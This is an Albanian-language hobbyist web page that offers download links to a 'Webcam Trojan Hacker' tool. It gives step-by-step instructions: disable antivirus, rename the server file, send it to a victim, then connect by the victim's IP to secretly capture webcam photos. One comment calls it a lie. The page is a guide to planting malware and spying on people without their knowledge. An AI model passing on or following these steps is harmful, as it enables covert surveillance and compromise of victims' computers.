Leshoja Kamern pa e dit ai hiq
Ky Program Permban Trojan Si Qdo Program Per Hack. Dhe Duhet Tja Dini IP Viktimës

Vazhdojm...

Së Pari e Nalni Antivirusin Pastaj Shkarkone Ket File.
Kodi:
http://rapidshare.com/files/188782070/Webcam_Trojan_Hacker.zipose                        

ose:

http://www.mediafire.com/?jjtdmi5ttgeFilen Me Emrin Server ja Ndryshoni emrin ja leni qysh doni ju dhe ja dergoni Viktimes
si te hap aj activizohet

edhe tash shkojm te Programi Client Shenojm IP edhe presim pak kur te lidhet Shkruan Conected pastaj klikon Start Capture edhe fillon me i bo foto Viktimes.

Faliminderit per viziten tuaj.
Comments on this page:
Comment posted by leta( leta-161hotmail.com ), 05/07/2011 at 3:35pm (UTC):
haha veq rren o kjo..:PAdd comment to this page:
Your Name:
Your Email address:
Your website URL:
Your message:
Hacker
 
Advertisement
 
Lajmet e Fundit
 
 
<bgsound src="yourmusic.mid">
 

=> Do you also want a homepage for free? Then click here! <=